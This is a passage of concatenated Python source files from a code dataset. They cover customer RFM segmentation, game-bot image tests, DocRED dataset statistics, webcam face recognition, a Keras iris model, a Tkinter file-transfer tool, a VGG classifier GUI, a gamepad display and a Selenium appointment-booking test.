Sell'\n elif ((df['RFM_Segment'] >= 221) or (df['RFM_Score'] >= 6)):\n return 'Cross Sell Recommendations and Discount coupons'\n elif (((df['RFM_Segment'] >= 121) and (df['R'] == 1)) or df['RFM_Score'] == 5):\n return 'Price incentives and Limited time offer'\n elif ((df['RFM_Score'] >= 4) and (df['R'] == 1)):\n return 'Aggressive price incentives'\n else:\n return 'Don\\'t spend too much trying to re-acquire'\n \n \n# Create a new variable RFM_Level\nrfm['RFM_Segment'] = rfm.RFM_Segment.apply(lambda x: int(x))\nrfm['Customer Segment'] = rfm.apply(rfm_level, axis=1)\n# Create a new variable RFM_Level\nrfm['Marketing Action'] = rfm.apply(rfm_action, axis=1)\n\n\n# Calculate average values for each Customer Segment, and return a size of each segment \nrfm_level_agg = rfm.groupby('Customer Segment').agg({\n 'Recency': 'mean',\n 'Frequency': 'mean',\n 'Monetary': ['mean', 'count'],\n 'Marketing Action': 'unique'\n}).round(1)\n# Print the aggregated dataset\nprint(rfm_level_agg)\n\nrfm_level_ag = pd.DataFrame(rfm_level_agg)\nrfm_level_ag = rfm_level_ag.reset_index()\nrfm_level_ag\n\n\n\n\n\n\n","sub_path":"KPMG/model_building.py","file_name":"model_building.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8048361","text":"\"\"\"\ntest_panels.py\n\nTest any functionality related to the image search functionality relating to the panels within the game.\n\nPanels in the game are represented by the six buttons available at the bottom most portion of the game,\nthese panels house basically all the functionality within the game. The goal of these tests is to ensure\nthat the image searching and methods available on the bot can determine what state the game is in at all times.\n\"\"\"\nfrom settings import TEST_CONFIG_FILE, TEST_STATS_FILE\nfrom titanbot.tt2.core.bot import Bot\nfrom titanbot.tt2.core.maps import IMAGES as BOT_IMAGES\nfrom titanbot.tt2.tests.maps import IMAGES as TEST_IMAGES\n\nfrom PIL import Image\nimport unittest\n\n\nclass TestPanelBotMethods(unittest.TestCase):\n \"\"\"Test functionality related to in-game panels here.\"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"Initialize the test case with a Bot instance for testing purposes.\"\"\"\n cls.bot = Bot(TEST_CONFIG_FILE, TEST_STATS_FILE)\n\n def test_any_panels_on_screen(self):\n \"\"\"Test that the bot can determine if any panels are currently on the screen or not.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n exit_panel = BOT_IMAGES[\"GENERIC\"][\"exit_panel\"]\n\n # These images should contain the \"exit_panel\" image when checked.\n true = (\n images[\"artifacts_collapsed\"], images[\"artifacts_expanded\"], images[\"equipment_collapsed\"],\n images[\"equipment_expanded\"], images[\"heroes_collapsed\"], images[\"heroes_expanded\"],\n images[\"master_collapsed\"], images[\"master_expanded\"], images[\"pets_collapsed\"],\n images[\"pets_expanded\"], images[\"shop_open\"],\n )\n # These images should not contain the \"exit_panel\" image when checked.\n false = (\n images[\"no_panel_open\"],\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(exit_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(exit_panel, bool_only=True, testing=True))\n\n def test_panel_collapse_on_screen(self):\n \"\"\"Test that the bot can determine if the collapse button is present on the screen.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n collapse_panel = BOT_IMAGES[\"GENERIC\"][\"collapse_panel\"]\n\n # These images should contain the \"collapse_panel\" image when checked.\n true = (\n images[\"artifacts_expanded\"], images[\"equipment_expanded\"], images[\"heroes_expanded\"],\n images[\"master_expanded\"], images[\"pets_expanded\"],\n )\n # These images should not contain the \"collapse_panel\" image when checked.\n false = (\n images[\"artifacts_collapsed\"], images[\"equipment_collapsed\"], images[\"heroes_collapsed\"],\n images[\"master_collapsed\"], images[\"no_panel_open\"], images[\"shop_open\"],\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(collapse_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(collapse_panel, bool_only=True, testing=True))\n\n def test_panel_expand_on_screen(self):\n \"\"\"Test that the bot can determine if the expand button is present on the screen.\"\"\"\n images = TEST_IMAGES[\"PANELS\"]\n expand_panel = BOT_IMAGES[\"GENERIC\"][\"expand_panel\"]\n\n # These images should contain the \"expand_panel\" image when checked.\n true = (\n images[\"artifacts_collapsed\"], images[\"equipment_collapsed\"], images[\"heroes_collapsed\"],\n images[\"master_collapsed\"],\n )\n # These images should not contain the \"expand_panel\" image when checked.\n false = (\n images[\"artifacts_expanded\"], images[\"equipment_expanded\"], images[\"heroes_expanded\"],\n images[\"master_expanded\"], images[\"pets_expanded\"], images[\"no_panel_open\"],\n images[\"shop_open\"]\n )\n\n for true_path in true:\n image = Image.open(true_path)\n self.bot.grabber.current = image\n self.assertTrue(self.bot.grabber.search(expand_panel, bool_only=True, testing=True))\n\n for false_path in false:\n image = Image.open(false_path)\n self.bot.grabber.current = image\n self.assertFalse(self.bot.grabber.search(expand_panel, bool_only=True, testing=True))\n\n def test_panel_buy_options(self):\n \"\"\"Test that the bot can determine if the different buy option buttons are present on the screen.\"\"\"\n images = (\n TEST_IMAGES[\"PANELS\"][\"master_buy_option_open_collapsed\"],\n TEST_IMAGES[\"PANELS\"][\"master_buy_option_open_collapsed\"],\n )\n\n # These images should all be present in the images above.\n buy_options = (\n BOT_IMAGES[\"GENERIC\"][\"buy_max\"], BOT_IMAGES[\"GENERIC\"][\"buy_one\"],\n BOT_IMAGES[\"GENERIC\"][\"buy_one_hundred\"], BOT_IMAGES[\"GENERIC\"][\"buy_ten\"],\n BOT_IMAGES[\"GENERIC\"][\"max\"],\n )\n\n for path in images:\n image = Image.open(path)\n self.bot.grabber.current = image\n for find in buy_options:\n self.assertTrue(self.bot.grabber.search(find, bool_only=True, testing=True))\n","sub_path":"titanbot/tt2/tests/test_panels.py","file_name":"test_panels.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"608151270","text":"import json\nimport numpy as np\n\ndata_dir = 'E:/workspace/repo/DocRED/code/prepro_data/'\n\n\ndef get_dist(h_vertex, t_vertex):\n min_d = 620\n for h_m in h_vertex:\n for t_m in t_vertex:\n d = abs(h_m['pos'][0] - t_m['pos'][0])\n min_d = min(min_d, d)\n return min_d\n\n\ndef number_of_pos_neg_triplets():\n from collections import defaultdict\n for split in ['train', 'dev', 'test']:\n counter = 0\n all_counter = 0\n for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n labels = defaultdict(list)\n for label in ex['labels']:\n labels[(label['h'], label['t'])].append(label['r'])\n counter += len(labels)\n all_counter += (len(ex['vertexSet'])*(len(ex['vertexSet'])-1))\n\n print(f\"{split}: all: {all_counter}, pos: {counter}, neg: {all_counter-counter}\")\n\n\ndef sent_avg_len():\n sent_lens = []\n for split in ['train', 'dev', 'test']:\n for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n sent_lens.extend([len(sent) for sent in ex['sents']])\n print(np.mean(sent_lens)) # 24.88\n\n\ndef coref_short_proportion():\n true_file = json.load(open(data_dir+f\"dev_train.json\"))\n all_counter = 0\n coref = [0]*2\n dist = [0]*2\n for idx, ins in enumerate(true_file):\n vertexSet = ins['vertexSet']\n for label in ins['labels']:\n key = f\"{idx}_{label['h']}_{label['t']}\"\n if len(vertexSet[label['h']]) > 1 or len(vertexSet[label['t']]) > 1:\n coref[0] += 1\n else:\n coref[1] += 1\n if 0 <= get_dist(vertexSet[label['h']], vertexSet[label['t']]) <= 25:\n dist[0] += 1\n else:\n dist[1] += 1\n all_counter += 1\n\n print(f\"all: {all_counter}, {coref[0]/float(all_counter)}({coref[0]}/{all_counter})\")\n print(f\"all: {all_counter}, {dist[0]/float(all_counter)}({dist[0]}/{all_counter})\")\n # dev\n # all: 12323, 0.5931185587925019(7309/12323) 60% have co-references\n # all: 12323, 0.6469203927615029(7972/12323) 65% short; 35% long distance\n # train\n # all: 38180, 0.5930330015715034(22642/38180) 60%\n # all: 38180, 0.639732844421163(24425/38180) 64%\n\n\ndef entity_type_combinations():\n h_t_entity_type_combs = set()\n for split in ['train', 'dev']:\n data = json.load(open(f\"{data_dir}dev_{split}.json\"))\n for ex in data:\n v = ex['vertexSet']\n for label in ex['labels']:\n h_idx, t_idx = label['h'], label['t']\n for h_m in v[h_idx]:\n for t_m in v[t_idx]:\n h_t_entity_type_combs.add((h_m['type'], t_m['type']))\n h_t_entity_type_combs = list(map(list, h_t_entity_type_combs))\n print(len(h_t_entity_type_combs))\n json.dump(h_t_entity_type_combs, open(f'{data_dir}DocRED_h_t_entity_type_combs_{len(h_t_entity_type_combs)}.json', 'w'), indent=2)\n\n\nentity_type_combinations()\n# num_vertex = []\n# for split in ['train', 'dev', 'test']:\n# for ex in json.load(open(data_dir+f\"dev_{split}.json\")):\n# num_vertex.append(len(ex['vertexSet']))\n#\n# print(f\"avg: {np.mean(num_vertex)}\")\n\n# number_of_pos_neg_triplets()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pre-processing/DocRED/gen_data_DocRED.py","file_name":"gen_data_DocRED.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"74132277","text":"import numpy as np\nimport cv2\nimport pickle\n\nface_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read(\"trainer.yml\")\n\nlabels = {\"person_name\": 0}\nwith open(\"labels.pickle\", 'rb') as f:\n oglabels = pickle.load(f)\n labels = {v:k for k,v in oglabels.items()}\n\ncap = cv2.VideoCapture(0)\n\ndef rescale_frame(frame, percent=50):\n width = int(frame.shape[1] * percent/ 100)\n height = int(frame.shape[0] * percent/ 100)\n dim = (width, height)\n return cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n\n\nwhile True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n for(x, y, w, h) in faces:\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n\n id_, conf = recognizer.predict(roi_gray)\n if conf>=55:\n print(labels[id_])\n font = cv2.FONT_HERSHEY_SIMPLEX\n name = labels[id_]\n color = (255, 255, 255)\n stroke = 1\n cv2.putText(frame, name, (x,y), font, 1, color, stroke, cv2.LINE_AA)\n\n img_item = 'my-image.png'\n cv2.imwrite(img_item, roi_gray)\n\n color = (255, 0, 0)\n stroke = 2\n width = x + w\n height = y + h\n cv2.rectangle(frame, (x, y), (width, height), color, stroke)\n\n frame50 = rescale_frame(frame, percent=75)\n cv2.imshow('frame', frame50)\n\n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"176672318","text":"import tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn import datasets\niris=datasets.load_iris()\nX=iris.data\ny=iris.target\nimport pandas as pd\ndf_features= pd.DataFrame(X)\ndf_features\ndf_target= pd.DataFrame(y)\ndf_target\n\nfrom sklearn.model_selection import train_test_split\n#split train test dataset\nX_train, X_test, y_train, y_test=train_test_split(X,y,test_size=0.2)\n\n#report folder\nif (not(os.path.isdir(\"report\"))):\n os.mkdir(\"report\")\n\n# Define Sequential model with 3 layers\nmodel = keras.Sequential(\n [\n layers.Dense(4, activation=\"relu\", name=\"layer1\"),\n layers.Dense(3, activation=\"relu\", name=\"layer2\"),\n layers.Dense(1, name=\"layer3\", activation=\"sigmoid\"),\n ]\n)\n\n#compiler model\nloss_fn = tf.keras.losses.mean_squared_error\nopt = keras.optimizers.Adam(learning_rate=0.01)\nmodel.compile(optimizer=keras.optimizers.get(opt), loss= loss_fn)\nhistory = model.fit(X_train, y_train, epochs=100, verbose=2)\n\n# printing summary\nfstructure = open(\"report/structure.txt\", \"w\")\nmodel.summary(print_fn=lambda x: fstructure.write(x + '\\n'))\nfstructure.close()\n\n# evaluation\nlosses = history.history['loss']\nepochs = history.epoch\n\nplt.plot(epochs, losses)\nplt.xlabel(\"epochs\")\nplt.ylabel('losses')\nplt.title('Loss per Epoch')\nplt.show()\nplt.savefig('report/history.png')\nfmetrics = open(\"report/metrics.txt\", \"w\")\nfmetrics.write('Initial loss value : '+ str(losses[0]) + \"\\n\")\nfmetrics.write('Final loss value : ' + str(losses[-1]))\nfmetrics.close()\n\n# saving\nmodel.save('report/weights.h5')\n\n","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405640465","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport shutil, os, stat, time, datetime, glob, sqlite3\nfrom datetime import timedelta\n\n#Define class\n\nclass FileCheck():\n #Frame is the Tkinter frame class that our own class will inherit from\n\n\n def __init__(self, master):\n \n\n\n\n #Initialize your class and Tkinter master-level frame\n #define the master frame configuration\n self.master = master\n self.master.minsize(500, 300) #setting (Height, Width)\n\n # This CenterWindow method will center the app on the user's screen\n self.master.title(\"File Transfer\")\n self.master.configure(background=\"lightblue\")\n\n self.t1 = StringVar()\n self.t2 = StringVar()\n self.t3 = StringVar() \n \n self.button1 = ttk.Button(self.master, text = \"Folder to update daily from.\", width =\n 30, command = self.inputFolder)\n self.button1.pack()\n self.txt1 = ttk.Entry(self.master, width = 50, textvariable = self.t1).pack()\n\n self.button2 = ttk.Button(self.master, text = \"Folder to update daily to\", width = 30,\n command = self.outputFolder)\n self.button2.pack()\n self.txt2 = ttk.Entry(self.master, width = 50, textvariable = self.t2).pack()\n\n self.button3 = ttk.Button(self.master, text = \"Transfer everything modified in the past 24 hours\",\n width = 50, command = self.transfer)\n self.button3.pack()\n self.Label = ttk.Label(text = \"Last File Check time\")\n self.txt3 = ttk.Entry(self.master, width = 50, textvariable = self.t3).pack()\n\n def inputFolder(self):\n folderInput = filedialog.askdirectory()\n print(\"folderInput: {}\".format(folderInput))\n self.t1.set(folderInput)\n\n def outputFolder(self):\n folderOutput = filedialog.askdirectory()\n print(\"folderOutput: {}\".format(folderOutput))\n self.t2.set(folderOutput)\n\n def transfer(self):\n fileFrom = self.t1.get()\n fileTo = self.t2.get()\n today1 = datetime.datetime.today()\n last24Hours = str(today1 - timedelta(hours=24))\n print(today1)\n\n for file in glob.glob(os.path.join(fileFrom, '*.txt')):\n epochDate = os.path.getmtime(file)\n modifiedDate = datetime.datetime.fromtimestamp(int(epochDate)).strftime('%Y-%m-%d %H:%M:%S')\n if modifiedDate > last24Hours:\n shutil.move(file, fileTo)\n self.t3.set(today1)\n dbToday = time.time()\n print(\"dbToday: {}\".format(dbToday))\n self.data_entry(dbToday) #don't use global variables! It is better to pass in today to your database function\n\n def create_table(self):\n conn = sqlite3.connect('transfersDate.db')\n with conn:\n c = conn.cursor()\n c.execute(\"CREATE TABLE IF NOT EXISTS date (time REAL)\")\n conn.commit()\n conn.close()\n\n def data_entry(self,dbToday):\n conn = sqlite3.connect('transfersDate.db')\n with conn:\n c = conn.cursor()\n c.execute(\"INSERT INTO date (time) VALUES(?)\"\"\",(dbToday))\n conn.commit()\n c.close()\n conn.close() \n\ndef main():\n\n root = Tk()\n App = FileCheck(root)\n root.mainloop()\n \n \nif __name__ == \"__main__\": main()\n","sub_path":"PyDrill_db_34_idle.py","file_name":"PyDrill_db_34_idle.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"51197542","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n#\nimport argparse\nimport json\nimport sys\n\nimport torch\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtWidgets import *\n\nfrom vgg_pytorch import VGG\nimport torch.npu\nimport os\nNPU_CALCULATE_DEVICE = 0\nif os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):\n NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))\nif torch.npu.current_device() != NPU_CALCULATE_DEVICE:\n torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')\n\nparser = argparse.ArgumentParser(\"VGGNet Classifier Tool\")\nparser.add_argument(\"-w\", \"--model_name\", type=str, default='vgg11',\n help=\"Weight of the model loaded by default.\")\nparser.add_argument(\"-s\", \"--image_size\", type=int, default=None,\n help=\"Size of classified image. (default=None).\")\nparser.add_argument(\"-l\", \"--labels_map\", type=str, default=\"./labels_map.txt\",\n help=\"Image tag. (default='./labels_map.txt').\")\nparser.add_argument(\"-n\", \"--num_classes\", type=int, default=1000,\n help=\"Number of categories of images. (default=1000).\")\nparser.add_argument(\"-p\", \"--echo\", type=bool, default=False,\n help=\"Show pop ups or not? (default: False)\")\nargs = parser.parse_args()\n\n\ndef classifier(image_path):\n # Open image\n img = Image.open(image_path)\n img = tfms(img).unsqueeze(0)\n\n # Classify with VGGNet\n with torch.no_grad():\n logits = model(img)\n preds = torch.topk(logits, k=1).indices.squeeze(0).tolist()\n\n for idx in preds:\n label = labels_map[idx]\n probability = torch.softmax(logits, dim=1)[0, idx].item()\n return label, probability\n\n\nclass Picture(QWidget):\n def __init__(self):\n super(Picture, self).__init__()\n\n self.resize(1000, 1000)\n self.setWindowTitle(\"Classifier tool\")\n\n self.label = QLabel(self)\n self.label.setFixedSize(args.image_size, args.image_size)\n self.label.move(300, 300)\n self.label.setStyleSheet(\n \"QLabel{background:white;}\"\n \"QLabel{color:rgb(0,0,0);font-size:18px;font-weight:bold;font-family:瀹嬩綋;}\"\n )\n\n # add open image button\n self.btn_open_img = QPushButton(self)\n self.btn_open_img.setText(\"Open image\")\n self.btn_open_img.move(10, 30)\n self.btn_open_img.clicked.connect(self.openimage)\n\n # add open popup window button\n self.btn_open_popup_window = QPushButton(self)\n self.btn_open_popup_window.setText(\"open popup window\")\n self.btn_open_popup_window.move(10, 200)\n self.btn_open_popup_window.clicked.connect(self.open_popup_window)\n\n # add close popup window button\n self.btn_close_popup_window = QPushButton(self)\n self.btn_close_popup_window.setText(\"close popup window\")\n self.btn_close_popup_window.move(10, 300)\n self.btn_close_popup_window.clicked.connect(self.close_popup_window)\n\n @staticmethod\n def open_popup_window():\n args.echo = True\n\n @staticmethod\n def close_popup_window():\n args.echo = False\n\n def openimage(self):\n img_name, _ = QFileDialog.getOpenFileName(self, \"Open image\", \"\", \"*.jpg;;*.png;;All Files(*)\")\n img = QtGui.QPixmap(img_name).scaled(args.image_size, args.image_size)\n self.label.setPixmap(img)\n text, prob = classifier(img_name)\n print(\"------------------------------\")\n print(f\"Label: {text:<75}\")\n print(f\"Probability: {prob:.6f}.\")\n print(\"------------------------------\")\n if args.echo:\n self.echo(str(text), prob)\n\n def echo(self, text, prob):\n QMessageBox.information(\n self, \"Message\",\n f\"Label :{str(text):<75}\\nProbability: {prob:.6f}\")\n\n\nif __name__ == \"__main__\":\n model = VGG.from_pretrained(args.model_name)\n model.eval()\n if args.image_size is None:\n args.image_size = VGG.get_image_size(args.model_name)\n # Preprocess image\n tfms = transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.CenterCrop(args.image_size),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ])\n\n # Load class names\n labels_map = json.load(open(args.labels_map))\n labels_map = [labels_map[str(i)] for i in range(args.num_classes)]\n\n app = QtWidgets.QApplication(sys.argv)\n my = Picture()\n my.show()\n sys.exit(app.exec_())\n","sub_path":"PyTorch/dev/cv/image_classification/VGGNet_ID0400_for_PyTorch/examples/simple/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"347876431","text":"\"\"\"\nController display (shows what inputs are used) for Logitech F310 using the DPad on Ubuntu 18.04.\n\"\"\"\n\nimport evdev\nimport curses\n\ndevice_name = \"/dev/input/event12\"\ndevice = evdev.InputDevice(device_name)\n\n# # Dicts for user reference. I don't use the values these explicitly in code.\n#\n# BTN_DICT = {\n# 304: \"A\",\n# 305: \"B\",\n# 307: \"Y\",\n# 308: \"X\",\n# 315: \"STR\",\n# 314: \"SEL\",\n# 310: \"L\",\n# 311: \"R\",\n# }\n#\n# DIRECTION_DICT = {(17, 1): \"D\", (17, -1): \"U\", (16, -1): \"L\", (16, 1): \"R\"}\n\nCONTROLLER_ASCII = \"\"\"\n +---------------------------+\n | ^ SEL STR Y |\n | < > X B |\n | v A |\n +---------------------------+\n\"\"\"\n\nCONTROLLER_ASCII_LOCATION_LOOKUP = {\n \"btn\": {\n 304: [(4, 24), \"A\"],\n 305: [(3, 26), \"B\"],\n 307: [(3, 22), \"X\"],\n 308: [(2, 24), \"Y\"],\n 315: [(2, 16), \"STR\"],\n 314: [(2, 11), \"SEL\"],\n # 310: [(2, 22), \"L\"],\n # 311: [(2, 22), \"R\"],\n },\n \"dpad\": {\n 17: {1: [(4, 5), \"v\"], -1: [(2, 5), \"^\"]},\n 16: {-1: [(3, 3), \"<\"], 1: [(3, 7), \">\"]},\n },\n}\n\n# The controller saves the axis, but not the pole.\nlast_direction_value = []\n\n\ndef main(stdscr):\n curses.start_color()\n\n # Default coloring\n curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\n # Coloring for the dpad.\n curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\n\n # Coloring for A, B, X, Y\n curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(4, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(5, curses.COLOR_BLUE, curses.COLOR_BLACK)\n curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n # Hides the cursor.\n curses.curs_set(0)\n\n # Init the ASCII image.\n stdscr.clear()\n stdscr.addstr(0, 0, CONTROLLER_ASCII, curses.color_pair(1))\n stdscr.refresh()\n\n def redraw_buttons(event_code, press=True):\n \"\"\"\n Redraws buttons excluding the D-pad; also adds color.\n \"\"\"\n\n button_to_curses_color_idx = {304: 6, 305: 4, 307: 3, 308: 5, 315: 2, 314: 2}\n\n val = CONTROLLER_ASCII_LOCATION_LOOKUP[\"btn\"][event_code]\n x, y = val[0]\n color = (\n curses.color_pair(button_to_curses_color_idx[event_code])\n if press\n else curses.color_pair(1)\n )\n stdscr.addstr(x, y, val[1], color)\n stdscr.refresh()\n\n def redraw_dpad(event_code, event_value, press=True):\n \"\"\"controller_display\n Redraws D-pad values.\n \"\"\"\n\n val = CONTROLLER_ASCII_LOCATION_LOOKUP[\"dpad\"][event_code][event_value]\n x, y = val[0]\n color = curses.color_pair(4) if press else curses.color_pair(1)\n stdscr.addstr(x, y, val[1], color)\n stdscr.refresh()\n\n def parse_buttons(event):\n \"\"\"\n Parses if a button is pressed or not, and what to do in each case.\n \"\"\"\n try:\n if event.value == 1: # if pressed...\n redraw_buttons(event.code, press=True)\n else:\n redraw_buttons(event.code, press=False)\n except Exception as e:\n pass\n\n def parse_dpad(event):\n \"\"\"\n Parses if the D-pad is pressed or not, and what to do in each case.\n \"\"\"\n\n global last_direction_value\n try:\n if event.value != 0: # if pressed...\n last_direction_value.append(event.value)\n redraw_dpad(event.code, event.value, press=True)\n\n else:\n for dir_val in last_direction_value:\n redraw_dpad(event.code, dir_val, press=False)\n except Exception as e:\n pass\n\n # Main loop; Parses if the button pressed is\n # the D-pad or a button (X, Y, A, B, etc.)\n for event in device.read_loop():\n if event.type == 1:\n parse_buttons(event)\n if event.type == 3:\n parse_dpad(event)\n\n\nif __name__ == \"__main__\":\n curses.wrapper(main)\n","sub_path":"snes_controller_display.py","file_name":"snes_controller_display.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405165092","text":"import unittest\r\nimport csv, operator\r\nimport smtplib\r\nfrom pyunitreport import HTMLTestRunner\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.select import Select\r\n\r\n#unit tests\r\n#Cases of test\r\nclass NewAppoiment(unittest.TestCase):\r\n @classmethod\r\n def setUpClass(self):\r\n self.driver = webdriver.Chrome(executable_path= r'./chromedriver.exe')\r\n driver = self.driver\r\n driver.maximize_window()\r\n driver.implicitly_wait(10)\r\n\r\n def test_new_appoiment(self):\r\n driver = self.driver\r\n driver.get('https://semindigital.com/')\r\n driver.implicitly_wait(10) \r\n\r\n lista = []\r\n with open('data.csv') as data:\r\n entrada = csv.reader(data)\r\n lista = list (entrada)\r\n x=0\r\n for linea in lista:\r\n #print(linea)\r\n #print (\"Iteracion \" , x)\r\n if(x==0):\r\n x=x+1 \r\n else:\r\n correo = linea [0]\r\n contrasena = linea [1]\r\n # cie10 = linea [2]\r\n estudio = linea [3]\r\n tipo_cita = linea [4]\r\n costo = linea [5]\r\n fecha_estudio = linea [6]\r\n hora_i = linea [7]\r\n hora_f = linea [8]\r\n telefono = linea [9]\r\n\r\n # Login\r\n email = driver.find_element_by_id ('email')\r\n password = driver.find_element_by_id('password')\r\n \r\n self.assertTrue(email.is_enabled() \r\n and password.is_enabled())\r\n\r\n email.send_keys(correo)\r\n password.send_keys(contrasena)\r\n \r\n driver.find_element_by_xpath('//*[@id=\"login\"]/div/div/div[2]/form/div[3]/div/div/button').click()\r\n driver.implicitly_wait(2)\r\n\r\n # Button new appoiment\r\n driver.find_element_by_xpath('//*[@id=\"container-princ\"]/app-medico/div[1]/div[1]/div[1]/button[1]').click()\r\n \r\n # New appoiment\r\n # Study to be carried out\r\n new_appoiment = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[1]')\r\n new_appoiment.clear()\r\n new_appoiment.send_keys(estudio)\r\n\r\n # Select appoiment type\r\n select_appoiment = Select(driver.find_element_by_id('tipo')) \r\n select_appoiment.select_by_visible_text(tipo_cita)\r\n\r\n # Cost\r\n cost = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[2]')\r\n cost.clear()\r\n cost.send_keys(costo)\r\n\r\n # Date\r\n date = driver.find_element_by_id('date')\r\n date.send_keys(fecha_estudio)\r\n \r\n # Start Time\r\n start_time = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[4]')\r\n start_time.send_keys(hora_i)\r\n\r\n # final time\r\n final_time = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[5]')\r\n final_time.send_keys(hora_f)\r\n\r\n # Phone\r\n phone = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/div/input[1]')\r\n phone.send_keys(telefono)\r\n\r\n self.assertTrue(new_appoiment.is_enabled()\r\n and cost.is_enabled()\r\n and date.is_enabled()\r\n and start_time.is_enabled()\r\n and final_time.is_enabled()\r\n and phone.is_enabled())\r\n\r\n # Button appoiment\r\n driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/div/button[2]').click()\r\n\r\n # Button return\r\n driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[1]/button').click()\r\n\r\n # Get out\r\n driver.find_element_by_xpath('//*[@id=\"body\"]/header/div/div[2]/a/div').click()\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == 